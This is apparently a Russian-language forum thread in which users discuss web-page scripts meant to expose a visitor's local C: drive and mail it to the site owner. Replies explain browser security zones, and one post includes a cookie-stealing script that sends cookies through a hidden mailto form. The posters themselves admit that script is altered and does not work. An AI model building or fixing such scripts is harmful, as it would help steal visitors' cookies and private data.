Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился в лог-файл и высылался на определенный мейл... Я долго ломал башку, но так и не доперло... Подскажите
Так просто не получится. Есть такое понятие как зона безопасности. Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен. Так например такой код: <iframe id="localdisk" src="c:\temp.html"></iframe> < script> alert(localdisk.document.innerHTML) </script> работать не будет, если он размещен на инетовской страничке(зона "Интернет". Будет выдаваться ошибка "Доступ запрещен". А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер", то работать будет ))
скрипт < script>javascript:navigate('file:///c:/'</script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает? http://www.danasoft.com/vipersig.jpg да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...)
есть такая феня: < script language=javascript> var cook=show_all_cookies(); document.open("cookies",cook); document.write('<form onsubmit="javascript:window.close();" method=post action="mailto:ваше мыло@mail.ru" ENCTYPE="text/plain"><input type=hidden name=h1 value=',cook,'><input type=submit value="Доброго времени суток!"> </form>' document.close("cookies" </SCRIPT> (скрипт в целях безопасности был немного изменён) НО она Изменена!!! Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...(((
И что это ? Насколько я понял это должно отсылать куки на мыло? Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет. И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)